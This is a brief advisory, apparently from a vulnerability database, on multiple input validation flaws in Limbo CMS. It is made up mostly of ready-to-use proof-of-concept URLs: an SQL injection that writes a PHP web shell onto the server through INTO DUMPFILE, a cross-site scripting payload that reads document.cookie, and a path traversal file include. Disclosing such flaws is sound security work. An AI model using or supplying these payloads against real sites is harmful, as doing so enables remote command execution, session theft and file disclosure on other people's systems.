|
Limbo CMS Multiple Input Validation Vulnerabilities
No exploit is required. The following proof of concept examples are available: SQL injection: http://www.example.com/[path]/index.php?_SERVER[]&_SERVER[REMOTE_ADDR]=999'UNION%20SELECT%20null,'<?php%20system($_G','ET[cmd]);?>'%20INTO%20DUMPFILE%20'[full_application_pa th]shell.php'%20FROM%20lm_simple_stats/*&option=weblinks&Itemid=999/* Cross-site scripting: http://www.example.com/[path]/?_SERVER[]=&_SERVER[REMOTE_ADDR]=<script>alert(document.cookie)</script> Local file include: http://www.example.com/[path_to_limbo]/index2.php?option=frontpage/../../../../../../../../../../../script |
|
|
Privacy Statement |